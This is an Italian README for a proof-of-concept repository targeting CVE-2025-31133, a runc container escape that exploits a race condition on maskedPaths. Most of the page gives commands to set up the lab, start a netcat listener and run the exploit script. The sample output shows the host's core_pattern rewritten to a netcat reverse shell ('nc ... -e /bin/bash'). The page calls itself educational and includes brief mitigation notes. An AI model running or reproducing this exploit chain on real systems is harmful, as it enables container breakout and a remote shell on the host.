
Dimostrazione didattica per CVE-2025-31133, un container escape di runc tramite condizione di gara su maskedPaths. Include configurazione del laboratorio, script di exploit e guida alla mitigazione per ricercatori di sicurezza.
Una dimostrazione proof-of-concept e un ambiente di apprendimento per CVE-2025-31133, una vulnerabilità di sicurezza in runc che consente di bypassare la protezione maskedPaths attraverso una race condition. maskedPaths sono progettati per impedire ai container di accedere a percorsi sensibili del filesystem host.
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 Questo repository è un esempio pratico della mentalità e delle tecniche di ricerca insegnate nel training Black Hat:
L'exploit sfrutta una race condition in cui:
maskedPaths per proteggere file sensibili (es. /proc/sys/kernel/core_pattern)/dev/null) nel rootfs del containerQuesto repository è solo a scopo educativo.
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
Lo script lab-setup.sh eseguirà:
chmod +x lab-setup.sh
./lab-setup.sh
Verifica che la versione vulnerabile di runc sia installata:
runc --version
Dovresti vedere la versione 1.2.0 o simile.
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
In caso di successo, dovresti vedere:
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
Una connessione reverse shell dovrebbe essere stabilita al tuo listener.
Per proteggersi da questa vulnerabilità:
core_pattern originale dopo un exploit riuscitoQuesto progetto è fornito a scopo educativo. Utilizzare in modo responsabile ed etico.
Ricorda: Utilizza sempre gli strumenti di sicurezza informatica in modo responsabile e solo in ambienti di tua proprietà o per i quali hai esplicita autorizzazione al test.